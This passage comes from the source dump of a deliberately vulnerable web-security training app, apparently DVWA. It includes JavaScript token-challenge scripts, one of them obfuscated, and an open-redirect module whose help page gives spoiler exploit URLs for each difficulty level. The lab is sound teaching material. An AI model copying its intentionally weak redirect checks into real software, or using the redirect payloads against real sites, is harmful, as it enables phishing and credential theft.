is224);\n }\n return method;\n };\n\n var nodeWrap = function (method, is224) {\n var crypto = eval(\"require('crypto')\");\n var Buffer = eval(\"require('buffer').Buffer\");\n var algorithm = is224 ? 'sha224' : 'sha256';\n var nodeMethod = function (message) {\n if (typeof message === 'string') {\n return crypto.createHash(algorithm).update(message, 'utf8').digest('hex');\n } else {\n if (message === null || message === undefined) {\n throw new Error(ERROR);\n } else if (message.constructor === ArrayBuffer) {\n message = new Uint8Array(message);\n }\n }\n if (Array.isArray(message) || ArrayBuffer.isView(message) ||\n message.constructor === Buffer) {\n return crypto.createHash(algorithm).update(new Buffer(message)).digest('hex');\n } else {\n return method(message);\n }\n };\n return nodeMethod;\n };\n\n var createHmacOutputMethod = function (outputType, is224) {\n return function (key, message) {\n return new HmacSha256(key, is224, true).update(message)[outputType]();\n };\n };\n\n var createHmacMethod = function (is224) {\n var method = createHmacOutputMethod('hex', is224);\n method.create = function (key) {\n return new HmacSha256(key, is224);\n };\n method.update = function (key, message) {\n return method.create(key).update(message);\n };\n for (var i = 0; i < OUTPUT_TYPES.length; ++i) {\n var type = OUTPUT_TYPES[i];\n method[type] = createHmacOutputMethod(type, is224);\n }\n return method;\n };\n\n function Sha256(is224, sharedMemory) {\n if (sharedMemory) {\n blocks[0] = blocks[16] = blocks[1] = blocks[2] = blocks[3] =\n blocks[4] = blocks[5] = blocks[6] = blocks[7] =\n blocks[8] = blocks[9] = blocks[10] = blocks[11] =\n blocks[12] = blocks[13] = blocks[14] = blocks[15] = 0;\n this.blocks = blocks;\n } else {\n this.blocks = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];\n }\n\n if (is224) {\n this.h0 = 0xc1059ed8;\n this.h1 = 0x367cd507;\n this.h2 = 0x3070dd17;\n this.h3 = 0xf70e5939;\n this.h4 = 0xffc00b31;\n this.h5 = 0x68581511;\n this.h6 = 0x64f98fa7;\n this.h7 = 0xbefa4fa4;\n } else { // 256\n this.h0 = 0x6a09e667;\n this.h1 = 0xbb67ae85;\n this.h2 = 0x3c6ef372;\n this.h3 = 0xa54ff53a;\n this.h4 = 0x510e527f;\n this.h5 = 0x9b05688c;\n this.h6 = 0x1f83d9ab;\n this.h7 = 0x5be0cd19;\n }\n\n this.block = this.start = this.bytes = this.hBytes = 0;\n this.finalized = this.hashed = false;\n this.first = true;\n this.is224 = is224;\n }\n\n Sha256.prototype.update = function (message) {\n if (this.finalized) {\n return;\n }\n var notString, type = typeof message;\n if (type !== 'string') {\n if (type === 'object') {\n if (message === null) {\n throw new Error(ERROR);\n } else if (ARRAY_BUFFER && message.constructor === ArrayBuffer) {\n message = new Uint8Array(message);\n } else if (!Array.isArray(message)) {\n if (!ARRAY_BUFFER || !ArrayBuffer.isView(message)) {\n throw new Error(ERROR);\n }\n }\n } else {\n throw new Error(ERROR);\n }\n notString = true;\n }\n var code, index = 0, i, length = message.length, blocks = this.blocks;\n\n while (index < length) {\n if (this.hashed) {\n this.hashed = false;\n blocks[0] = this.block;\n blocks[16] = blocks[1] = blocks[2] = blocks[3] =\n blocks[4] = blocks[5] = blocks[6] = blocks[7] =\n blocks[8] = blocks[9] = blocks[10] = blocks[11] =\n blocks[12] = blocks[13] = blocks[14] = blocks[15] = 0;\n }\n\n if (notString) {\n for (i = this.start; index < length && i < 64; ++index) {\n blocks[i >> 2] |= message[index] << SHIFT[i++ & 3];\n }\n } else {\n for (i = this.start; index < length && i < 64; ++index) {\n code = message.charCodeAt(index);\n if (code < 0x80) {\n blocks[i >> 2] |= code << SHIFT[i++ & 3];\n } else if (code < 0x800) {\n blocks[i >> 2] |= (0xc0 | (code >> 6)) << SHIFT[i++ & 3];\n blocks[i >> 2] |= (0x80 | (code & 0x3f)) << SHIFT[i++ & 3];\n } else if (code < 0xd800 || code >= 0xe000) {\n blocks[i >> 2] |= (0xe0 | (code >> 12)) << SHIFT[i++ & 3];\n blocks[i >> 2] |= (0x80 | ((code >> 6) & 0x3f)) << SHIFT[i++ & 3];\n blocks[i >> 2] |= (0x80 | (code & 0x3f)) << SHIFT[i++ & 3];\n } else {\n code = 0x10000 + (((code & 0x3ff) << 10) | (message.charCodeAt(++index) & 0x3ff));\n blocks[i >> 2] |= (0xf0 | (code >> 18)) << SHIFT[i++ & 3];\n blocks[i >> 2] |= (0x80 | ((code >> 12) & 0x3f)) << SHIFT[i++ & 3];\n blocks[i >> 2] |= (0x80 | ((code >> 6) & 0x3f)) << SHIFT[i++ & 3];\n blocks[i >> 2] |= (0x80 | (code & 0x3f)) << SHIFT[i++ & 3];\n }\n }\n }\n\n this.lastByteIndex = i;\n this.bytes += i - this.start;\n if (i >= 64) {\n this.block = blocks[16];\n this.start = i - 64;\n this.hash();\n this.hashed = true;\n } else {\n this.start = i;\n }\n }\n if (this.bytes > 4294967295) {\n this.hBytes += this.bytes / 4294967296 << 0;\n this.bytes = this.bytes % 4294967296;\n }\n return this;\n };\n\n Sha256.prototype.finalize = function () {\n if (this.finalized) {\n return;\n }\n this.finalized = true;\n var blocks = this.blocks, i = this.lastByteIndex;\n blocks[16] = this.block;\n blocks[i >> 2] |= EXTRA[i & 3];\n this.block = blocks[16];\n if (i >= 56) {\n if (!this.hashed) {\n this.hash();\n }\n blocks[0] = this.block;\n blocks[16] = blocks[1] = blocks[2] = blocks[3] =\n blocks[4] = blocks[5] = blocks[6] = blocks[7] =\n blocks[8] = blocks[9] = blocks[10] = blocks[11] =\n blocks[12] = blocks[13] = blocks[14] = blocks[15] = 0;\n }\n blocks[14] = this.hBytes << 3 | this.bytes >>> 29;\n blocks[15] = this.bytes << 3;\n this.hash();\n };\n\n Sha256.prototype.hash = function () {\n var a = this.h0, b = this.h1, c = this.h2, d = this.h3, e = this.h4, f = this.h5, g = this.h6,\n h = this.h7, blocks = this.blocks, j, s0, s1, maj, t1, t2, ch, ab, da, cd, bc;\n\n for (j = 16; j < 64; ++j) {\n // rightrotate\n t1 = blocks[j - 15];\n s0 = ((t1 >>> 7) | (t1 << 25)) ^ ((t1 >>> 18) | (t1 << 14)) ^ (t1 >>> 3);\n t1 = blocks[j - 2];\n s1 = ((t1 >>> 17) | (t1 << 15)) ^ ((t1 >>> 19) | (t1 << 13)) ^ (t1 >>> 10);\n blocks[j] = blocks[j - 16] + s0 + blocks[j - 7] + s1 << 0;\n }\n\n bc = b & c;\n for (j = 0; j < 64; j += 4) {\n if (this.first) {\n if (this.is224) {\n ab = 300032;\n t1 = blocks[0] - 1413257819;\n h = t1 - 150054599 << 0;\n d = t1 + 24177077 << 0;\n } else {\n ab = 704751109;\n t1 = blocks[0] - 210244248;\n h = t1 - 1521486534 << 0;\n d = t1 + 143694565 << 0;\n }\n this.first = false;\n } else {\n s0 = ((a >>> 2) | (a << 30)) ^ ((a >>> 13) | (a << 19)) ^ ((a >>> 22) | (a << 10));\n s1 = ((e >>> 6) | (e << 26)) ^ ((e >>> 11) | (e << 21)) ^ ((e >>> 25) | (e << 7));\n ab = a & b;\n maj = ab ^ (a & c) ^ bc;\n ch = (e & f) ^ (~e & g);\n t1 = h + s1 + ch + K[j] + blocks[j];\n t2 = s0 + maj;\n h = d + t1 << 0;\n d = t1 + t2 << 0;\n }\n s0 = ((d >>> 2) | (d << 30)) ^ ((d >>> 13) | (d << 19)) ^ ((d >>> 22) | (d << 10));\n s1 = ((h >>> 6) | (h << 26)) ^ ((h >>> 11) | (h << 21)) ^ ((h >>> 25) | (h << 7));\n da = d & a;\n maj = da ^ (d & b) ^ ab;\n ch = (h & e) ^ (~h & f);\n t1 = g + s1 + ch + K[j + 1] + blocks[j + 1];\n t2 = s0 + maj;\n g = c + t1 << 0;\n c = t1 + t2 << 0;\n s0 = ((c >>> 2) | (c << 30)) ^ ((c >>> 13) | (c << 19)) ^ ((c >>> 22) | (c << 10));\n s1 = ((g >>> 6) | (g << 26)) ^ ((g >>> 11) | (g << 21)) ^ ((g >>> 25) | (g << 7));\n cd = c & d;\n maj = cd ^ (c & a) ^ da;\n ch = (g & h) ^ (~g & e);\n t1 = f + s1 + ch + K[j + 2] + blocks[j + 2];\n t2 = s0 + maj;\n f = b + t1 << 0;\n b = t1 + t2 << 0;\n s0 = ((b >>> 2) | (b << 30)) ^ ((b >>> 13) | (b << 19)) ^ ((b >>> 22) | (b << 10));\n s1 = ((f >>> 6) | (f << 26)) ^ ((f >>> 11) | (f << 21)) ^ ((f >>> 25) | (f << 7));\n bc = b & c;\n maj = bc ^ (b & d) ^ cd;\n ch = (f & g) ^ (~f & h);\n t1 = e + s1 + ch + K[j + 3] + blocks[j + 3];\n t2 = s0 + maj;\n e = a + t1 << 0;\n a = t1 + t2 << 0;\n }\n\n this.h0 = this.h0 + a << 0;\n this.h1 = this.h1 + b << 0;\n this.h2 = this.h2 + c << 0;\n this.h3 = this.h3 + d << 0;\n this.h4 = this.h4 + e << 0;\n this.h5 = this.h5 + f << 0;\n this.h6 = this.h6 + g << 0;\n this.h7 = this.h7 + h << 0;\n };\n\n Sha256.prototype.hex = function () {\n this.finalize();\n\n var h0 = this.h0, h1 = this.h1, h2 = this.h2, h3 = this.h3, h4 = this.h4, h5 = this.h5,\n h6 = this.h6, h7 = this.h7;\n\n var hex = HEX_CHARS[(h0 >> 28) & 0x0F] + HEX_CHARS[(h0 >> 24) & 0x0F] +\n HEX_CHARS[(h0 >> 20) & 0x0F] + HEX_CHARS[(h0 >> 16) & 0x0F] +\n HEX_CHARS[(h0 >> 12) & 0x0F] + HEX_CHARS[(h0 >> 8) & 0x0F] +\n HEX_CHARS[(h0 >> 4) & 0x0F] + HEX_CHARS[h0 & 0x0F] +\n HEX_CHARS[(h1 >> 28) & 0x0F] + HEX_CHARS[(h1 >> 24) & 0x0F] +\n HEX_CHARS[(h1 >> 20) & 0x0F] + HEX_CHARS[(h1 >> 16) & 0x0F] +\n HEX_CHARS[(h1 >> 12) & 0x0F] + HEX_CHARS[(h1 >> 8) & 0x0F] +\n HEX_CHARS[(h1 >> 4) & 0x0F] + HEX_CHARS[h1 & 0x0F] +\n HEX_CHARS[(h2 >> 28) & 0x0F] + HEX_CHARS[(h2 >> 24) & 0x0F] +\n HEX_CHARS[(h2 >> 20) & 0x0F] + HEX_CHARS[(h2 >> 16) & 0x0F] +\n HEX_CHARS[(h2 >> 12) & 0x0F] + HEX_CHARS[(h2 >> 8) & 0x0F] +\n HEX_CHARS[(h2 >> 4) & 0x0F] + HEX_CHARS[h2 & 0x0F] +\n HEX_CHARS[(h3 >> 28) & 0x0F] + HEX_CHARS[(h3 >> 24) & 0x0F] +\n HEX_CHARS[(h3 >> 20) & 0x0F] + HEX_CHARS[(h3 >> 16) & 0x0F] +\n HEX_CHARS[(h3 >> 12) & 0x0F] + HEX_CHARS[(h3 >> 8) & 0x0F] +\n HEX_CHARS[(h3 >> 4) & 0x0F] + HEX_CHARS[h3 & 0x0F] +\n HEX_CHARS[(h4 >> 28) & 0x0F] + HEX_CHARS[(h4 >> 24) & 0x0F] +\n HEX_CHARS[(h4 >> 20) & 0x0F] + HEX_CHARS[(h4 >> 16) & 0x0F] +\n HEX_CHARS[(h4 >> 12) & 0x0F] + HEX_CHARS[(h4 >> 8) & 0x0F] +\n HEX_CHARS[(h4 >> 4) & 0x0F] + HEX_CHARS[h4 & 0x0F] +\n HEX_CHARS[(h5 >> 28) & 0x0F] + HEX_CHARS[(h5 >> 24) & 0x0F] +\n HEX_CHARS[(h5 >> 20) & 0x0F] + HEX_CHARS[(h5 >> 16) & 0x0F] +\n HEX_CHARS[(h5 >> 12) & 0x0F] + HEX_CHARS[(h5 >> 8) & 0x0F] +\n HEX_CHARS[(h5 >> 4) & 0x0F] + HEX_CHARS[h5 & 0x0F] +\n HEX_CHARS[(h6 >> 28) & 0x0F] + HEX_CHARS[(h6 >> 24) & 0x0F] +\n HEX_CHARS[(h6 >> 20) & 0x0F] + HEX_CHARS[(h6 >> 16) & 0x0F] +\n HEX_CHARS[(h6 >> 12) & 0x0F] + HEX_CHARS[(h6 >> 8) & 0x0F] +\n HEX_CHARS[(h6 >> 4) & 0x0F] + HEX_CHARS[h6 & 0x0F];\n if (!this.is224) {\n hex += HEX_CHARS[(h7 >> 28) & 0x0F] + HEX_CHARS[(h7 >> 24) & 0x0F] +\n HEX_CHARS[(h7 >> 20) & 0x0F] + HEX_CHARS[(h7 >> 16) & 0x0F] +\n HEX_CHARS[(h7 >> 12) & 0x0F] + HEX_CHARS[(h7 >> 8) & 0x0F] +\n HEX_CHARS[(h7 >> 4) & 0x0F] + HEX_CHARS[h7 & 0x0F];\n }\n return hex;\n };\n\n Sha256.prototype.toString = Sha256.prototype.hex;\n\n Sha256.prototype.digest = function () {\n this.finalize();\n\n var h0 = this.h0, h1 = this.h1, h2 = this.h2, h3 = this.h3, h4 = this.h4, h5 = this.h5,\n h6 = this.h6, h7 = this.h7;\n\n var arr = [\n (h0 >> 24) & 0xFF, (h0 >> 16) & 0xFF, (h0 >> 8) & 0xFF, h0 & 0xFF,\n (h1 >> 24) & 0xFF, (h1 >> 16) & 0xFF, (h1 >> 8) & 0xFF, h1 & 0xFF,\n (h2 >> 24) & 0xFF, (h2 >> 16) & 0xFF, (h2 >> 8) & 0xFF, h2 & 0xFF,\n (h3 >> 24) & 0xFF, (h3 >> 16) & 0xFF, (h3 >> 8) & 0xFF, h3 & 0xFF,\n (h4 >> 24) & 0xFF, (h4 >> 16) & 0xFF, (h4 >> 8) & 0xFF, h4 & 0xFF,\n (h5 >> 24) & 0xFF, (h5 >> 16) & 0xFF, (h5 >> 8) & 0xFF, h5 & 0xFF,\n (h6 >> 24) & 0xFF, (h6 >> 16) & 0xFF, (h6 >> 8) & 0xFF, h6 & 0xFF\n ];\n if (!this.is224) {\n arr.push((h7 >> 24) & 0xFF, (h7 >> 16) & 0xFF, (h7 >> 8) & 0xFF, h7 & 0xFF);\n }\n return arr;\n };\n\n Sha256.prototype.array = Sha256.prototype.digest;\n\n Sha256.prototype.arrayBuffer = function () {\n this.finalize();\n\n var buffer = new ArrayBuffer(this.is224 ? 28 : 32);\n var dataView = new DataView(buffer);\n dataView.setUint32(0, this.h0);\n dataView.setUint32(4, this.h1);\n dataView.setUint32(8, this.h2);\n dataView.setUint32(12, this.h3);\n dataView.setUint32(16, this.h4);\n dataView.setUint32(20, this.h5);\n dataView.setUint32(24, this.h6);\n if (!this.is224) {\n dataView.setUint32(28, this.h7);\n }\n return buffer;\n };\n\n function HmacSha256(key, is224, sharedMemory) {\n var i, type = typeof key;\n if (type === 'string') {\n var bytes = [], length = key.length, index = 0, code;\n for (i = 0; i < length; ++i) {\n code = key.charCodeAt(i);\n if (code < 0x80) {\n bytes[index++] = code;\n } else if (code < 0x800) {\n bytes[index++] = (0xc0 | (code >> 6));\n bytes[index++] = (0x80 | (code & 0x3f));\n } else if (code < 0xd800 || code >= 0xe000) {\n bytes[index++] = (0xe0 | (code >> 12));\n bytes[index++] = (0x80 | ((code >> 6) & 0x3f));\n bytes[index++] = (0x80 | (code & 0x3f));\n } else {\n code = 0x10000 + (((code & 0x3ff) << 10) | (key.charCodeAt(++i) & 0x3ff));\n bytes[index++] = (0xf0 | (code >> 18));\n bytes[index++] = (0x80 | ((code >> 12) & 0x3f));\n bytes[index++] = (0x80 | ((code >> 6) & 0x3f));\n bytes[index++] = (0x80 | (code & 0x3f));\n }\n }\n key = bytes;\n } else {\n if (type === 'object') {\n if (key === null) {\n throw new Error(ERROR);\n } else if (ARRAY_BUFFER && key.constructor === ArrayBuffer) {\n key = new Uint8Array(key);\n } else if (!Array.isArray(key)) {\n if (!ARRAY_BUFFER || !ArrayBuffer.isView(key)) {\n throw new Error(ERROR);\n }\n }\n } else {\n throw new Error(ERROR);\n }\n }\n\n if (key.length > 64) {\n key = (new Sha256(is224, true)).update(key).array();\n }\n\n var oKeyPad = [], iKeyPad = [];\n for (i = 0; i < 64; ++i) {\n var b = key[i] || 0;\n oKeyPad[i] = 0x5c ^ b;\n iKeyPad[i] = 0x36 ^ b;\n }\n\n Sha256.call(this, is224, sharedMemory);\n\n this.update(iKeyPad);\n this.oKeyPad = oKeyPad;\n this.inner = true;\n this.sharedMemory = sharedMemory;\n }\n HmacSha256.prototype = new Sha256();\n\n HmacSha256.prototype.finalize = function () {\n Sha256.prototype.finalize.call(this);\n if (this.inner) {\n this.inner = false;\n var innerHash = this.array();\n Sha256.call(this, this.is224, this.sharedMemory);\n this.update(this.oKeyPad);\n this.update(innerHash);\n Sha256.prototype.finalize.call(this);\n }\n };\n\n var exports = createMethod();\n exports.sha256 = exports;\n exports.sha224 = createMethod(true);\n exports.sha256.hmac = createHmacMethod();\n exports.sha224.hmac = createHmacMethod(true);\n\n if (COMMON_JS) {\n module.exports = exports;\n } else {\n root.sha256 = exports.sha256;\n root.sha224 = exports.sha224;\n if (AMD) {\n define(function () {\n return exports;\n });\n }\n }\n})();\n\nfunction do_something(e){for(var t=\"\",n=e.length-1;n>=0;n--)t+=e[n];return t}\n\nfunction token_part_3(t, y=\"ZZ\") {\n\tdocument.getElementById(\"token\").value=sha256(document.getElementById(\"token\").value+y)\n}\n\nfunction token_part_2(e=\"YY\") {\n\tdocument.getElementById(\"token\").value=sha256(e+document.getElementById(\"token\").value)\n}\n\nfunction token_part_1(a,b) {\n\tdocument.getElementById(\"token\").value=do_something(document.getElementById(\"phrase\").value)\n}\n\ndocument.getElementById(\"phrase\").value=\"\";\n\nsetTimeout(function(){token_part_2(\"XX\")},300);\n\ndocument.getElementById(\"send\").addEventListener(\"click\", token_part_3); \n\ntoken_part_1(\"ABCD\", 44);\n"
},
{
"path": "vulnerabilities/javascript/source/impossible.php",
"content": ""
},
{
"path": "vulnerabilities/javascript/source/low.php",
"content": "\n\n/*\nMD5 code from here\nhttps://github.com/blueimp/JavaScript-MD5\n*/\n\n!function(n){\"use strict\";function t(n,t){var r=(65535&n)+(65535&t);return(n>>16)+(t>>16)+(r>>16)<<16|65535&r}function r(n,t){return n<>>32-t}function e(n,e,o,u,c,f){return t(r(t(t(e,n),t(u,f)),c),o)}function o(n,t,r,o,u,c,f){return e(t&r|~t&o,n,t,u,c,f)}function u(n,t,r,o,u,c,f){return e(t&o|r&~o,n,t,u,c,f)}function c(n,t,r,o,u,c,f){return e(t^r^o,n,t,u,c,f)}function f(n,t,r,o,u,c,f){return e(r^(t|~o),n,t,u,c,f)}function i(n,r){n[r>>5]|=128<>>9<<4)]=r;var e,i,a,d,h,l=1732584193,g=-271733879,v=-1732584194,m=271733878;for(e=0;e>5]>>>t%32&255);return r}function d(n){var t,r=[];for(r[(n.length>>2)-1]=void 0,t=0;t>5]|=(255&n.charCodeAt(t/8))<16&&(o=i(o,8*n.length)),r=0;r<16;r+=1)u[r]=909522486^o[r],c[r]=1549556828^o[r];return e=i(u.concat(d(t)),512+8*t.length),a(i(c.concat(e),640))}function g(n){var t,r,e=\"\";for(r=0;r>>4&15)+\"0123456789abcdef\".charAt(15&t);return e}function v(n){return unescape(encodeURIComponent(n))}function m(n){return h(v(n))}function p(n){return g(m(n))}function s(n,t){return l(v(n),v(t))}function C(n,t){return g(s(n,t))}function A(n,t,r){return t?r?s(t,n):C(t,n):r?m(n):p(n)}\"function\"==typeof define&&define.amd?define(function(){return A}):\"object\"==typeof module&&module.exports?module.exports=A:n.md5=A}(this);\n\n\tfunction rot13(inp) {\n\t\treturn inp.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c<=\"Z\"?90:122)>=(c=c.charCodeAt(0)+13)?c:c-26);});\n\t}\n\n\tfunction generate_token() {\n\t\tvar phrase = document.getElementById(\"phrase\").value;\n\t\tdocument.getElementById(\"token\").value = md5(rot13(phrase));\n\t}\n\n\tgenerate_token();\n\nEOF;\n?>\n"
},
{
"path": "vulnerabilities/javascript/source/medium.js",
"content": "function do_something(e){for(var t=\"\",n=e.length-1;n>=0;n--)t+=e[n];return t}setTimeout(function(){do_elsesomething(\"XX\")},300);function do_elsesomething(e){document.getElementById(\"token\").value=do_something(e+document.getElementById(\"phrase\").value+\"XX\")}\n"
},
{
"path": "vulnerabilities/javascript/source/medium.php",
"content": "';\n?>\n"
},
{
"path": "vulnerabilities/open_redirect/help/help.php",
"content": "
\\n\";\r\n\r\ndvwaHtmlEcho( $page );\r\n\r\n?>\r\n"
},
{
"path": "vulnerabilities/open_redirect/source/high.php",
"content": "\r\n\t\t\n\t\tYou can never trust anything that comes from the user or prevent them from messing with it and so there is no impossible level.\n\t
\nEOF;\n} else {\n$page[ 'body' ] = <<Vulnerability: JavaScript Attacks
\n\n\t\n\t\nEOF;\n\n$page[ 'body' ] .= \"\n\t
\\n\";\n\ndvwaHtmlEcho( $page );\n\n?>\n"
},
{
"path": "vulnerabilities/javascript/source/high.js",
"content": "var a=['fromCharCode','toString','replace','BeJ','\\x5cw+','Lyg','SuR','(w(){\\x273M\\x203L\\x27;q\\x201l=\\x273K\\x203I\\x203J\\x20T\\x27;q\\x201R=1c\\x202I===\\x271n\\x27;q\\x20Y=1R?2I:{};p(Y.3N){1R=1O}q\\x202L=!1R&&1c\\x202M===\\x271n\\x27;q\\x202o=!Y.2S&&1c\\x202d===\\x271n\\x27&&2d.2Q&&2d.2Q.3S;p(2o){Y=3R}z\\x20p(2L){Y=2M}q\\x202G=!Y.3Q&&1c\\x202g===\\x271n\\x27&&2g.X;q\\x202s=1c\\x202l===\\x27w\\x27&&2l.3P;q\\x201y=!Y.3H&&1c\\x20Z!==\\x272T\\x27;q\\x20m=\\x273G\\x27.3z(\\x27\\x27);q\\x202w=[-3y,3x,3v,3w];q\\x20U=[24,16,8,0];q\\x20K=[3A,3B,3F,3E,3D,3C,3T,3U,4d,4c,4b,49,4a,4e,4f,4j,4i,4h,3u,48,47,3Z,3Y,3X,3V,3W,40,41,46,45,43,42,4k,3f,38,36,39,37,34,33,2Y,31,2Z,35,3t,3n,3m,3l,3o,3p,3s,3r,3q,3k,3j,3d,3a,3c,3b,3e,3h,3g,3i,4g];q\\x201E=[\\x271e\\x27,\\x2727\\x27,\\x271G\\x27,\\x272R\\x27];q\\x20l=[];p(Y.2S||!1z.1K){1z.1K=w(1x){A\\x204C.Q.2U.1I(1x)===\\x27[1n\\x201z]\\x27}}p(1y&&(Y.50||!Z.1N)){Z.1N=w(1x){A\\x201c\\x201x===\\x271n\\x27&&1x.1w&&1x.1w.1J===Z}}q\\x202m=w(1X,x){A\\x20w(s){A\\x20O\\x20N(x,1d).S(s)[1X]()}};q\\x202a=w(x){q\\x20P=2m(\\x271e\\x27,x);p(2o){P=2P(P,x)}P.1T=w(){A\\x20O\\x20N(x)};P.S=w(s){A\\x20P.1T().S(s)};1g(q\\x20i=0;i<1E.W;++i){q\\x20T=1E[i];P[T]=2m(T,x)}A\\x20P};q\\x202P=w(P,x){q\\x201S=2O(\\x222N(\\x271S\\x27)\\x22);q\\x201Y=2O(\\x222N(\\x271w\\x27).1Y\\x22);q\\x202n=x?\\x271H\\x27:\\x271q\\x27;q\\x202z=w(s){p(1c\\x20s===\\x272p\\x27){A\\x201S.2x(2n).S(s,\\x274S\\x27).1G(\\x271e\\x27)}z{p(s===2q||s===2T){1u\\x20O\\x201t(1l)}z\\x20p(s.1J===Z){s=O\\x202r(s)}}p(1z.1K(s)||Z.1N(s)||s.1J===1Y){A\\x201S.2x(2n).S(O\\x201Y(s)).1G(\\x271e\\x27)}z{A\\x20P(s)}};A\\x202z};q\\x202k=w(1X,x){A\\x20w(G,s){A\\x20O\\x201P(G,x,1d).S(s)[1X]()}};q\\x202f=w(x){q\\x20P=2k(\\x271e\\x27,x);P.1T=w(G){A\\x20O\\x201P(G,x)};P.S=w(G,s){A\\x20P.1T(G).S(s)};1g(q\\x20i=0;i<1E.W;++i){q\\x20T=1E[i];P[T]=2k(T,x)}A\\x20P};w\\x20N(x,1v){p(1v){l[0]=l[16]=l[1]=l[2]=l[3]=l[4]=l[5]=l[6]=l[7]=l[8]=l[9]=l[10]=l[11]=l[12]=l[13]=l[14]=l[15]=0;k.l=l}z{k.l=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]}p(x){k.C=4I;k.B=4H;k.E=4l;k.F=4U;k.J=4J;k.I=4K;k.H=4L;k.D=4T}z{k.C=4X;k.B=4W;k.E=4Y;k.F=4Z;k.J=4V;k.I=4O;k.H=4F;k.D=4s}k.1C=k.1A=k.L=k.2i=0;k.1U=k.1L=1O;k.2j=1d;k.x=x}N.Q.S=w(s){p(k.1U){A}q\\x202h,T=1c\\x20s;p(T!==\\x272p\\x27){p(T===\\x271n\\x27){p(s===2q){1u\\x20O\\x201t(1l)}z\\x20p(1y&&s.1J===Z){s=O\\x202r(s)}z\\x20p(!1z.1K(s)){p(!1y||!Z.1N(s)){1u\\x20O\\x201t(1l)}}}z{1u\\x20O\\x201t(1l)}2h=1d}q\\x20r,M=0,i,W=s.W,l=k.l;4t(M\n\t\tSubmit the word \"success\" to win.\n\t
\n\n\t$message\n\n\t\nEOF;\n}\n\nrequire_once DVWA_WEB_PAGE_TO_ROOT . \"vulnerabilities/javascript/source/{$vulnerabilityFile}\";\n\n$page[ 'body' ] .= <<More Information
\n\t- \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://www.w3schools.com/js/' ) . \" \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://www.youtube.com/watch?v=cs7EQdWO5o0&index=17&list=WL' ) . \" \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://ponyfoo.com/articles/es6-proxies-in-depth' ) . \" \n\t
Module developed by Digininja.
\n\r\n\t
\r\n\r\n\t
\r\n"
},
{
"path": "vulnerabilities/open_redirect/index.php",
"content": "\r\n\tHelp - Open HTTP Redirect
\r\n\r\n\t\r\n\t\r\n\t
\r\n\r\n\t
\r\n\r\n\t\r\n\t\t About\r\n\t\t\r\n\t\tOWASP define this as:\r\n\t\t \r\n\t\t\r\n\t\t\tUnvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.\r\n\t\t\r\n\r\n\t\t As suggested above, a common use for this is to create a URL which initially goes to the real site but then redirects the victim off to a site controlled by the attacker. This site could be a clone of the target's login page to steal credentials, a request for credit card details to pay for a service on the target site, or simply a spam page full of advertising. \r\n\r\n\t\t\r\n\r\n\t\t Objective\r\n\t\tAbuse the redirect page to move the user off the DVWA site or onto a different page on the site than expected. \r\n\r\n\t\t\r\n\r\n\t\t Low Level\r\n\t\tThe redirect page has no limitations, you can redirect to anywhere you want. \r\n\t\tSpoiler: Try browsing to /vulnerabilities/open_redirect/source/low.php?redirect=https://digi.ninja \r\n\r\n\t\t\r\n\r\n\t\t Medium Level\r\n\t\tThe code prevents you from using absolute URLs to take the user off the site, so you can either use relative URLs to take them to other pages on the same site or a Protocol-relative URL. \r\n\r\n\t\tSpoiler: Try browsing to /vulnerabilities/open_redirect/source/low.php?redirect=//digi.ninja \r\n\r\n\t\t\r\n\r\n\t\t High Level\r\n\t\tThe redirect page tries to lock you to only redirect to the info.php page, but does this by checking that the URL contains \"info.php\". \r\n\r\n\t\tSpoiler: Try browsing to /vulnerabilities/open_redirect/source/low.php?redirect=https://digi.ninja/?a=info.php \r\n\r\n\t\t\r\n\r\n\t\t Impossible Level\r\n\t\tRather than accepting a page or URL as the redirect target, the system uses ID values to tell the redirect page where to redirect to. This ties the system down to only redirect to pages it knows about and so there is no way for an attacker to modify things to go to a page of their choosing. \r\n\r\n\t | \r\n\t
\r\n\r\n\t
Reference:
\r\nVulnerability: Open HTTP Redirect
\r\n\r\n\t\r\n\t\t
\r\n\r\n\tHacker History
\r\n\t\t\r\n\t\t\tHere are two links to some famous hacker quotes, see if you can hack them.\r\n\t\t
\r\n\t\t\r\n\t\t{$html}\r\n\tMore Information
\r\n\t- \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html', \"OWASP Unvalidated Redirects and Forwards Cheat Sheet\" ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/04-Testing_for_Client-side_URL_Redirect', \"WSTG - Testing for Client-side URL Redirect\") . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://cwe.mitre.org/data/definitions/601.html', \"Mitre - CWE-601: URL Redirection to Untrusted Site ('Open Redirect')\" ) . \" \r\n\t
You can only redirect to the info page.
\r\n\t\t\r\nMissing redirect target.
\r\n\r\n" }, { "path": "vulnerabilities/open_redirect/source/impossible.php", "content": "\r\n\t\tUnknown redirect target.\r\n\t\t\r\nMissing redirect target.\r\n" }, { "path": "vulnerabilities/open_redirect/source/info.php", "content": "I got a record, I was Zero CoolZero Cool. Crashed 1507 systems in one day, biggest crash in history, front page, New York Times August 10th 1988.\";\r\n\t\t\tbreak;\r\n\t\tcase 2:\r\n\t\t\t$info = \"Who are you anyway?
Johnny.
Johnny who?
Just... Johnny?\";\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\t$info = \"Some other stuff\";\r\n\t}\r\n}\r\n\r\nif ($info == \"\") {\r\n\thttp_response_code (500);\r\n\t?>\r\n\t
Missing quote ID.
\r\n\t\r\n\tVulnerability: Open HTTP Redirect
\r\n\r\n\t\r\n\r\n\tMore Information
\r\n\t- \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html', \"OWASP Unvalidated Redirects and Forwards Cheat Sheet\" ) . \" \r\n\t\t
